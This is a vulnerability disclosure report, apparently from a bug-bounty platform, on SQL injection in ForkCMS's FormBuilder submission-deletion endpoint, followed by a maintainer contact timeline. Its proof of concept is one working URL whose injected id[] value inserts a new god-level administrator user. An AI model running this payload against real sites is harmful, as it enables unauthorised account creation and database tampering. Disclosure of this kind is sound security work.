SQL Injection in forkcms/forkcms
Valid
Reported on
Oct 30th 2021
Description
When deleting submissions which belong to a formular (made with module FormBuilder
), the parameter id[]
is vulnerable for SQL injection.
Proof of Concept
- Call the URL
http://127.0.0.1/private/en/form_builder/mass_data_action?form_id=2&token=aettnn67s&id[]=3);insert%20into%20users(email,password,is_god)%20values%20(%27attacker@example.com%27,%27$2y$10$qqJ9L1lIp38gKpqh1V3l1.EqLzj.brB0IqUPQ2XXcSjl6Dtcgq16C%27,1);--+&action=delete
- To test this URL successfully, you need a valid formular and some submissions to that formular. You might have to adjust the parameter
form_id
to another value. - After calling this URL, you have a new entry in
users
table.
Impact
The attacker can tamper data in the database as they want.
We have contacted a member of the
forkcms
team and are waiting to hear back
7 months ago
We have sent a
follow up to the
forkcms
team.
We will try again in 7 days.
7 months ago
We have sent a
second
follow up to the
forkcms
team.
We will try again in 10 days.
6 months ago
We have sent a
third and final
follow up to the
forkcms
team.
This report is now considered stale.
6 months ago
csrf token fails and blocks this
The disclosure bounty has been dropped
The fix bounty has been dropped
Jelmer Prins
has been awarded the fix bounty
to join this conversation